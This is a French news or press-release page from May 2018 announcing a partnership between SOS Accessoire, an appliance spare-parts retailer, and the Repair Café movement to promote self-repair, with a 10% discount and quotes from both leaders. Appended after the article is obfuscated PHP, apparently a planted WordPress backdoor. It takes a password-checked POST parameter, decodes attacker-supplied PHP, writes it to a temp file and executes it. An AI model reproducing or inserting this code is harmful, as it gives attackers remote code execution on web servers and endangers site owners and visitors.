Previous Article Next ArticleSOS Accessoire et Repair Café s’allient pour soutenir l’anti-gaspillage et l’autoréparation

SOS Accessoire et Repair Café s’allient pour soutenir l’anti-gaspillage et l’autoréparation

SOS Accessoire et Repair Café s’allient pour soutenir l’anti-gaspillage et l’autoréparation Posted on mai 24, 2018

SOS Accessoire, entreprise spécialisée dans la vente en ligne de pièces détachées pour appareils électroménagers et Repair Café, association anti-gâchis encourageant la réparation des objets du quotidien, unissent leurs forces pour promouvoir l’autoréparation et ainsi lutter contre le gaspillage et l’obsolescence programmée.

SOS Accessoire est LE spécialiste de la vente en ligne de pièces détachées pour l’électroménager. Mais pas seulement. La société guide également les internautes tout au long de leur parcours : du diagnostic relatif à la panne de leurs appareils, aux conseils pour y remédier, jusqu’à la réparation de ceux-ci. Plus de 700 000 clients sont déjà passés par le site pour donner une seconde vie à leurs machines.

Repair Café est un mouvement mondial qui rassemble au sein de ses « Repair Cafés », présents notamment en Ile-de-France, des experts bénévoles ayant des connaissances accrues dans le domaine de la réparation. Ouverts à tous, les Repair Cafés rendent possible toute sorte de réparation, pour tout type d’appareil.

Avec ce partenariat de visibilité, les deux entités espèrent sensibiliser un maximum d’usagers à la réparation : chaque personne se rendant dans un Repair Café pourra bénéficier de 10% de réduction pour réparer un appareil électroménager. Les experts pourront ainsi assister ces derniers à l’aide de conseils et de tutoriels. Une initiative d’entraide sociale qui incite l’économie du durable et renforce le pouvoir d’achat.

« Nous souhaitons que la réparation redevienne un réflexe pour les Français. Ce partenariat à pour but de conserver, de répandre la connaissance et le savoir-faire en termes de réparation ainsi que de stimuler la cohésion sociale en mettant en relation les usagers. Des rencontres qui se veulent inspirantes et accessibles à tousSOS Accessoire est un partenaire adéquat pour appuyer notre initiative d’autoréparation. » commente Martine Postma, directrice de la fondation Repair Café.

« Avec ce partenariat, nous souhaitons mettre en lumière notre volonté de lutter contre le gaspillage et l’obsolescence programmée. Les Repair Cafés sont des lieux qui proposent de réelles alternatives au remplacement des appareils du quotidien. Grâce aux formations à la réparation réalisées par les experts bénévoles, les usagers peuvent apprendre à réparer facilement tout type d’objets : des vêtements aux meubles, en passant par les appareils électroménagers. Dans ces lieux, une communauté d’ambassadeurs du « bricolage des appareils domestiques » se réunit pour s’entraider et prouver que la plupart des appareils peut se réparer facilement sans avoir besoin de jeter ou remplacer , » témoigne Olivier De Montlivault, PDG de SOS Accessoire.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}